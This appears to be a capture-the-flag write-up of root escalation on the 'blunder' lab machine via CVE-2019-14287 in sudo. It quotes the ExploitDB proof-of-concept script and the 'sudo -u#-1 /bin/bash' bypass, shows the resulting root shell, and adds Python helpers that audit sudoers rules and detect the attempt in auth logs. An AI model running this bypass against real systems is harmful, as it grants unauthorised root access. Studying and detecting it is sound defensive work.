CVE-2019-14287


A vulnerability was found in sudo up to 1.8.27 (Operating System Utility Software). It has been rated as critical. Affected by this issue is an unknown part of the component Runas Restriction Handler. The manipulation with the input value -1/4294967295 leads to an input validation vulnerability. Using CWE to declare the problem leads to CWE-20: the product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Impacted are confidentiality, integrity, and availability.

hugo@blunder:/$ sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1

As discovered previously, the sudo instance on the target system fits the description of the vulnerability: 1.8.25p1 is older than 1.8.28, the release that fixes the bug.
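The version check above can be made repeatable. The following is an added audit helper, not code from the write-up or from sudo: it takes the text of `sudo --version` and of a sudoers file and reports rules of the `(ALL, !root)` shape that an unpatched sudo lets the listed user bypass. The sudoers grammar it understands is a deliberately partial assumption (plain `user host=(runas) commands` lines only), and the sample version banner and sudoers lines are constructed from the ones quoted on this page.

```python
#!/usr/bin/env python3
"""Added audit helper (not part of the write-up or of sudo): given the text of
`sudo --version` and of a sudoers file, report rules that an unpatched sudo lets
the listed user bypass with CVE-2019-14287. Nothing is executed on the host."""
import re

# sudo 1.8.28 is the release that fixes CVE-2019-14287.
FIXED_VERSION = (1, 8, 28)

# Assumed, deliberately partial sudoers grammar: "user host = (runas) commands".
# Line continuations, aliases in the runas list and Cmnd aliases are not handled.
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>\S.*)$"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")


def parse_sudo_version(version_output):
    """Return (major, minor, patch) from `sudo --version` output; the patch-level
    suffix (the 'p1' in 1.8.25p1) is ignored because the fix is a full release."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", version_output)
    if m is None:
        raise ValueError("no 'Sudo version X.Y.Z' line found")
    return tuple(int(x) for x in m.groups())


def version_is_affected(version):
    """Every release before 1.8.28 is affected."""
    return tuple(version) < FIXED_VERSION


def runas_excludes_root_from_all(runas_spec):
    """True for a runas user list such as 'ALL, !root' or 'ALL,!#0': any user is
    permitted except root, which is exactly the rule -u#-1 defeats.  Only the
    user half of a 'users:groups' spec is examined."""
    users = [u.strip() for u in runas_spec.split(":")[0].split(",")]
    return "ALL" in users and any(u in ("!root", "!#0") for u in users)


def parse_sudoers_rules(sudoers_text):
    """Yield (user, host, runas, cmds) for each user-specification line."""
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if m:
            yield m.group("user"), m.group("host"), m.group("runas"), m.group("cmds")


def audit(version_output, sudoers_text):
    """Return one finding per bypassable rule, or [] if sudo is already fixed."""
    if not version_is_affected(parse_sudo_version(version_output)):
        return []
    findings = []
    for user, host, runas, cmds in parse_sudoers_rules(sudoers_text):
        if runas_excludes_root_from_all(runas):
            findings.append({
                "user": user,
                "rule": f"{user} {host}=({runas}) {cmds}",
                "fix": "upgrade sudo to 1.8.28 or later; until then replace the "
                       "'ALL, !root' exclusion with an explicit list of run-as users",
            })
    return findings


# Constructed sample input, modelled on the version banner and sudoers lines
# quoted in the write-up, plus two rules that are not affected.
SAMPLE_VERSION = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults env_reset
root    ALL=(ALL:ALL) ALL
hacker  ALL=(ALL,!root) /bin/bash
deploy  ALL=(www-data) /usr/bin/systemctl restart app
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_VERSION, SAMPLE_SUDOERS):
        print(f"{f['rule']}\n  -> {f['fix']}")
```

Run it against `sudo --version` and `sudoers` output collected from a host; a rule such as `root ALL=(ALL:ALL) ALL` is not reported because it never relies on excluding root, and nothing is reported once the version is 1.8.28 or newer.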

Exploit


# Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo <1.8.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : 2019-14287
 
'''Check for the user sudo permissions
 
sudo -l 
 
User hacker may run the following commands on kali:
    (ALL, !root) /bin/bash
 
 
So user hacker can't run /bin/bash as root (!root)
 
 
User hacker sudo privilege in /etc/sudoers
 
# User privilege specification
root    ALL=(ALL:ALL) ALL
 
hacker ALL=(ALL,!root) /bin/bash
 
 
With ALL specified, user hacker can run the binary /bin/bash as any user
 
EXPLOIT: 
 
sudo -u#-1 /bin/bash
 
Example : 
 
hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#
 
Description :
Sudo doesn't check for the existence of the specified user id and executes the command with an arbitrary user id with the sudo privilege
-u#-1 returns as 0 which is root's id
 
and /bin/bash is executed with root permission
Proof of Concept Code :
 
How to use :
python3 sudo_exploit.py
 
'''
 
 
#!/usr/bin/python3
 
import os
 
#Get current username
 
username = input("Enter current username :")
 
 
#check which binary the user can run with sudo
 
os.system("sudo -l > priv")
 
 
os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
 
binary_file = open("binary")
 
binary= binary_file.read()
 
#execute sudo exploit
 
print("Lets hope it works")
 
os.system("sudo -u#-1 "+ binary)

Exploit available via ExploitDB
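The invocation shown above leaves a trace: sudo logs every run, and a numeric target with no passwd entry is recorded as `USER=#N`. The following detection helper is an added example, not code from the write-up or from sudo; it assumes the usual syslog layout of sudo's log lines (`sudo: <invoker> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>`) and flags only the two values that CVE-2019-14287 turns into root, -1 and its unsigned form 4294967295. The sample log lines are constructed.

```python
#!/usr/bin/env python3
"""Added detection helper (not part of the write-up or of sudo): scan sudo's
syslog/auth.log entries for invocations that asked to run as uid -1 or
4294967295, the two values CVE-2019-14287 turns into root on unpatched sudo."""
import re

# Assumed line layout, as sudo logs it via syslog:
#   "<host> sudo: <invoker> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
# A numeric -u#N target with no passwd entry is logged as USER=#N.
ENTRY_RE = re.compile(
    r"sudo:\s+(?P<invoker>\S+)\s*:.*?\bUSER=(?P<runas>\S+)\s*;.*?\bCOMMAND=(?P<command>.*)$"
)
NUMERIC_RUNAS_RE = re.compile(r"^#(?P<uid>-?\d+)$")
UID_MAX = 2**32 - 1  # 4294967295: (uid_t)-1 on a 32-bit uid_t


def parse_sudo_entry(line):
    """Return {'invoker', 'runas', 'command'} for a sudo log line, or None."""
    m = ENTRY_RE.search(line)
    return m.groupdict() if m else None


def requested_uid(runas):
    """Numeric uid behind a USER=#N field, or None for a named target."""
    m = NUMERIC_RUNAS_RE.match(runas)
    return int(m.group("uid")) if m else None


def is_cve_2019_14287_attempt(entry):
    """uid -1 has a 'do not change' meaning for setresuid(), so an unpatched
    sudo that passes it through simply stays at its own uid 0."""
    uid = requested_uid(entry["runas"])
    return uid is not None and uid in (-1, UID_MAX)


def scan(lines):
    """Return the suspicious entries found in an iterable of log lines."""
    hits = []
    for line in lines:
        entry = parse_sudo_entry(line)
        if entry and is_cve_2019_14287_attempt(entry):
            hits.append(entry)
    return hits


# Constructed sample log: one unrelated sshd line, a legitimate named target,
# the two CVE-2019-14287 forms, and a harmless numeric target (uid 33).
SAMPLE_LOG = [
    "Oct 15 10:00:00 kali sshd[1234]: Accepted publickey for hacker from 10.10.14.5",
    "Oct 15 10:01:22 kali sudo:   hacker : TTY=pts/0 ; PWD=/home/hacker ; USER=www-data ; COMMAND=/bin/bash",
    "Oct 15 10:02:05 kali sudo:   hacker : TTY=pts/0 ; PWD=/home/hacker ; USER=#-1 ; COMMAND=/bin/bash",
    "Oct 15 10:03:40 kali sudo:   hacker : TTY=pts/0 ; PWD=/home/hacker ; USER=#4294967295 ; COMMAND=/bin/bash",
    "Oct 15 10:04:12 kali sudo:   deploy : TTY=pts/1 ; PWD=/srv/app ; USER=#33 ; COMMAND=/usr/bin/systemctl restart app",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"CVE-2019-14287 attempt: {hit['invoker']} requested "
              f"{hit['runas']} for {hit['command']}")
```

Feeding `/var/log/auth.log` (or `journalctl -u sudo` output) through `scan` gives the same two hits for a real attempt; a `USER=#0` request is not flagged because a `(ALL, !root)` rule already refuses it and the refusal is logged separately.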

Exploitation


hugo@blunder:/$ sudo -u#-1 /bin/bash
root@blunder:/#
root@blunder:/# whoami
root
root@blunder:/# hostname
blunder
root@blunder:/# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.191  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:30a  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:30a  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:0a  txqueuelen 1000  (Ethernet)
        RX packets 4718175  bytes 412410735 (412.4 MB)
        RX errors 0  dropped 151  overruns 0  frame 0
        TX packets 3613887  bytes 2490061668 (2.4 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 25757  bytes 2286043 (2.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 25757  bytes 2286043 (2.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise